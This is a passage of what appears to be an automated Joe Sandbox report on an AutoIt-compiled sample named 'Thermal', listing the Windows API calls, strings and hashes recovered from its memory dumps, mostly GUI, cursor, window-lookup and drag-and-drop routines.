                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: bd55da49be845616bea8ca7260c67c25bc36d70ee7062a6d08b4b7e39ff458fb
                                                      • Instruction ID: df1c09050e4c3ced1368313a4b0d7f4ca8351944a6b0cd4f1175dbeca6ce0468
                                                      • Opcode Fuzzy Hash: bd55da49be845616bea8ca7260c67c25bc36d70ee7062a6d08b4b7e39ff458fb
                                                      • Instruction Fuzzy Hash: 22E1AF78900218AFDF219F51CC89EEF7BB8EF1A750F108156F915AA291D7708AC1DF61
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 001A5007
                                                      • GetDesktopWindow.USER32 ref: 001A501C
                                                      • GetWindowRect.USER32(00000000), ref: 001A5023
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A5085
                                                      • DestroyWindow.USER32(?), ref: 001A50B1
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001A50DA
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A50F8
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001A511E
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 001A5133
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001A5146
                                                      • IsWindowVisible.USER32(?), ref: 001A5166
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 001A5181
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 001A5195
                                                      • GetWindowRect.USER32(?,?), ref: 001A51AD
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 001A51D3
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 001A51ED
                                                      • CopyRect.USER32(?,?), ref: 001A5204
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 001A526F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 6854c7eb1fe3de6a56c9930abf7281b7ecb76254a68269c07ecf2e3bb02fd6ee
                                                      • Instruction ID: 024ca9563c88aff6b51236ce3f4a1011a18558299d964fbd725c439b4472ace5
                                                      • Opcode Fuzzy Hash: 6854c7eb1fe3de6a56c9930abf7281b7ecb76254a68269c07ecf2e3bb02fd6ee
                                                      • Instruction Fuzzy Hash: 69B1A970608700AFDB04DF64D984B6BBBE6FF89310F008A1DF5999B291DB71E845CB92
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0018499C
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001849C2
                                                      • _wcscpy.LIBCMT ref: 001849F0
                                                      • _wcscmp.LIBCMT ref: 001849FB
                                                      • _wcscat.LIBCMT ref: 00184A11
                                                      • _wcsstr.LIBCMT ref: 00184A1C
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00184A38
                                                      • _wcscat.LIBCMT ref: 00184A81
                                                      • _wcscat.LIBCMT ref: 00184A88
                                                      • _wcsncpy.LIBCMT ref: 00184AB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: 7d9ee2241e0935a0355f14ba6b84930399906a58f4eaf67ddcf5051522bb178b
                                                      • Instruction ID: 98306259092e163c666dca7d7d24701b227851ad388b25370aea324ea866c755
                                                      • Opcode Fuzzy Hash: 7d9ee2241e0935a0355f14ba6b84930399906a58f4eaf67ddcf5051522bb178b
                                                      • Instruction Fuzzy Hash: 6E411872604205BBDB15B7708C43EBF7BACDF55720F000159F905A71A2EF34EA419BA5
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00122C8C
                                                      • GetSystemMetrics.USER32(00000007), ref: 00122C94
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00122CBF
                                                      • GetSystemMetrics.USER32(00000008), ref: 00122CC7
                                                      • GetSystemMetrics.USER32(00000004), ref: 00122CEC
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00122D09
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00122D19
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00122D4C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00122D60
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00122D7E
                                                      • GetStockObject.GDI32(00000011), ref: 00122D9A
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00122DA5
                                                        • Part of subcall function 00122714: GetCursorPos.USER32(?), ref: 00122727
                                                        • Part of subcall function 00122714: ScreenToClient.USER32(001E77B0,?), ref: 00122744
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000001), ref: 00122769
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000002), ref: 00122777
                                                      • SetTimer.USER32(00000000,00000000,00000028,001213C7), ref: 00122DCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 1ff7683f75de36e12514d9dfa5aae9202ab7ebdc53bd8563b77e5e75060666aa
                                                      • Instruction ID: 8914fbced615511a0ecb78827b451bdd840bec6208808f4dbe9e65c7771de473
                                                      • Opcode Fuzzy Hash: 1ff7683f75de36e12514d9dfa5aae9202ab7ebdc53bd8563b77e5e75060666aa
                                                      • Instruction Fuzzy Hash: 10B17F71A0021AEFDB15DFA8EC89FAE77B4FB18311F114225FA15AB690DB70A850CF50
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • GetForegroundWindow.USER32(001B0980,?,?,?,?,?), ref: 001404E3
                                                      • IsWindow.USER32(?), ref: 001766BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Foreground_memmove
                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                      • API String ID: 3828923867-1919597938
                                                      • Opcode ID: 6474676bb0f51a6b7abf46993a3e74b8ee94db7513d93d4a1e2775e209c63167
                                                      • Instruction ID: fa03d3783b6f5b6285a4a21e9c77990d7d0fa22b750b3fecb83bd34a6d413c46
                                                      • Opcode Fuzzy Hash: 6474676bb0f51a6b7abf46993a3e74b8ee94db7513d93d4a1e2775e209c63167
                                                      • Instruction Fuzzy Hash: 4FD1F570104B02EFCB09EF60C48199ABBB5BF68344F508A1DF599576A2DB30F959CB92
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 001A44AC
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001A456C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: 98b8144ed90426c64df1422e5ba51fb74d3deaff55e4d36acc1e0af06434ef00
                                                      • Instruction ID: 9b82c810e7fc40f0be7e967cdd7086f2afc6ff242a3fb65dc9fb90eb4f17824e
                                                      • Opcode Fuzzy Hash: 98b8144ed90426c64df1422e5ba51fb74d3deaff55e4d36acc1e0af06434ef00
                                                      • Instruction Fuzzy Hash: FCA191342143519FCB14EF64C951A6AB3A5BFAA314F108929F8569B3E2DB70EC09CB91
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 001956E1
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 001956EC
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 001956F7
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00195702
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0019570D
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00195718
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00195723
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 0019572E
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00195739
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00195744
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 0019574F
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 0019575A
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00195765
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00195770
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0019577B
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00195786
                                                      • GetCursorInfo.USER32(?), ref: 00195796
                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 001957C1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                      • String ID:
                                                      • API String ID: 3215588206-0
                                                      • Opcode ID: 83f126d6186a614dcea8a51bba20a254a21858e5b1a21aaf0b25a2c5084952d9
                                                      • Instruction ID: fcaa09aef89748384576fa73f39b8084401d82fba9050c5452763000a8f15311
                                                      • Opcode Fuzzy Hash: 83f126d6186a614dcea8a51bba20a254a21858e5b1a21aaf0b25a2c5084952d9
                                                      • Instruction Fuzzy Hash: B5414170E04319AADF109FBA8C4996EFEB8EF51B50B10452FA509E7290DBB8A5018F51
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0017B17B
                                                      • __swprintf.LIBCMT ref: 0017B21C
                                                      • _wcscmp.LIBCMT ref: 0017B22F
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0017B284
                                                      • _wcscmp.LIBCMT ref: 0017B2C0
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0017B2F7
                                                      • GetDlgCtrlID.USER32(?), ref: 0017B349
                                                      • GetWindowRect.USER32(?,?), ref: 0017B37F
                                                      • GetParent.USER32(?), ref: 0017B39D
                                                      • ScreenToClient.USER32(00000000), ref: 0017B3A4
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0017B41E
                                                      • _wcscmp.LIBCMT ref: 0017B432
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0017B458
                                                      • _wcscmp.LIBCMT ref: 0017B46C
                                                        • Part of subcall function 0014385C: _iswctype.LIBCMT ref: 00143864
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: 55c7f2931a668624a79ab4c7d8aafc6df3b4ce85baf0d435d3fae7715c62065c
                                                      • Instruction ID: a62b08d2c5f8c613ca469873d38a8f96ee4cff1fe5e4fb84abd4ee999530313a
                                                      • Opcode Fuzzy Hash: 55c7f2931a668624a79ab4c7d8aafc6df3b4ce85baf0d435d3fae7715c62065c
                                                      • Instruction Fuzzy Hash: 4BA1C071208206ABDB15DF64C8C4BAAB7F8FF58354F108619F99EC2191DB30EA95CB91
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0017BAB1
                                                      • _wcscmp.LIBCMT ref: 0017BAC2
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0017BAEA
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0017BB07
                                                      • _wcscmp.LIBCMT ref: 0017BB25
                                                      • _wcsstr.LIBCMT ref: 0017BB36
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0017BB6E
                                                      • _wcscmp.LIBCMT ref: 0017BB7E
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0017BBA5
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0017BBEE
                                                      • _wcscmp.LIBCMT ref: 0017BBFE
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0017BC26
                                                      • GetWindowRect.USER32(00000004,?), ref: 0017BC8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: 8004c8aeaa4d3e897912a561062395c07851515bdcb2cdb78667dde161973e73
                                                      • Instruction ID: fafa85de8033fdd175d23540e2359b226e45afb50b647ce4b2d718490ba1ffa8
                                                      • Opcode Fuzzy Hash: 8004c8aeaa4d3e897912a561062395c07851515bdcb2cdb78667dde161973e73
                                                      • Instruction Fuzzy Hash: 78819D710082099BDB15DF14C8C5FAA7BE8FF54314F14C56AFD898A0A6EB34EE45CBA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: f5d823bf1200000bec1e914382d7fc94f4c3291f242f75501aeb36c6a2de9dfa
                                                      • Instruction ID: 7faa284fe9dee0a90223ae706f98e372c740b359f468e1bb8af045190fc7cc6f
                                                      • Opcode Fuzzy Hash: f5d823bf1200000bec1e914382d7fc94f4c3291f242f75501aeb36c6a2de9dfa
                                                      • Instruction Fuzzy Hash: 2331E1B1A48205F6CB04EB60CD83FEE73B4AF30754FA04126F665B11E2EF56AE04C652
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 0017CBAA
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0017CBBC
                                                      • SetWindowTextW.USER32(?,?), ref: 0017CBD3
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0017CBE8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 0017CBEE
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0017CBFE
                                                      • SetWindowTextW.USER32(00000000,?), ref: 0017CC04
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0017CC25
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0017CC3F
                                                      • GetWindowRect.USER32(?,?), ref: 0017CC48
                                                      • SetWindowTextW.USER32(?,?), ref: 0017CCB3
                                                      • GetDesktopWindow.USER32 ref: 0017CCB9
                                                      • GetWindowRect.USER32(00000000), ref: 0017CCC0
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0017CD0C
                                                      • GetClientRect.USER32(?,?), ref: 0017CD19
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0017CD3E
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0017CD69
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: d2e94fa3b618c346ceef9aab871f3e8c9d026c1b1345159554de6bcf5d639d6b
                                                      • Instruction ID: a3c135d8af3074920e5a945ff1cfbb62b7922b075b7886e809e3398969dabf93
                                                      • Opcode Fuzzy Hash: d2e94fa3b618c346ceef9aab871f3e8c9d026c1b1345159554de6bcf5d639d6b
                                                      • Instruction Fuzzy Hash: 82515E70900709AFDB219FA8CE85B6FBBF5FF08705F00461CE58AA29A0D774A954CB50
                                                      APIs
                                                      • _memset.LIBCMT ref: 001AA87E
                                                      • DestroyWindow.USER32(00000000,?), ref: 001AA8F8
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001AA972
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001AA994
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001AA9A7
                                                      • DestroyWindow.USER32(00000000), ref: 001AA9C9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 001AAA00
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001AAA19
                                                      • GetDesktopWindow.USER32 ref: 001AAA32
                                                      • GetWindowRect.USER32(00000000), ref: 001AAA39
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001AAA51
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001AAA69
                                                        • Part of subcall function 001229AB: GetWindowLongW.USER32(?,000000EB), ref: 001229BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: 7e85a764f88f9191467617697a91a33636379dc27e2bbc16ed91b13e833524fb
                                                      • Instruction ID: 40b22832c3f9a5cdca43e386ec4192029a4fbd43ce559f2a7b06caa400c911ac
                                                      • Opcode Fuzzy Hash: 7e85a764f88f9191467617697a91a33636379dc27e2bbc16ed91b13e833524fb
                                                      • Instruction Fuzzy Hash: 80719A75240240AFE722CF28CC48FAB7BE5FB8A304F44061DF986872A1D770E956CB52
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DragQueryPoint.SHELL32(?,?), ref: 001ACCCF
                                                        • Part of subcall function 001AB1A9: ClientToScreen.USER32(?,?), ref: 001AB1D2
                                                        • Part of subcall function 001AB1A9: GetWindowRect.USER32(?,?), ref: 001AB248
                                                        • Part of subcall function 001AB1A9: PtInRect.USER32(?,?,001AC6BC), ref: 001AB258
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 001ACD38
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001ACD43
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001ACD66
                                                      • _wcscat.LIBCMT ref: 001ACD96
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001ACDAD
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 001ACDC6
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 001ACDDD
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 001ACDFF
                                                      • DragFinish.SHELL32(?), ref: 001ACE06
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001ACEF9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 5385d0229b033a03b428245345ad7a128898575fddf9b8e191d853f76b828fed
                                                      • Instruction ID: 260263208efa06a64d48c824bc41995dd2f27c950a85531b70fbf1e896464667
                                                      • Opcode Fuzzy Hash: 5385d0229b033a03b428245345ad7a128898575fddf9b8e191d853f76b828fed
                                                      • Instruction Fuzzy Hash: DA618C71108301AFC711EFA0DC85D9FBBE8EF99750F000A2EF595932A1DB709A49CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 0018831A
                                                      • VariantCopy.OLEAUT32(00000000,?), ref: 00188323
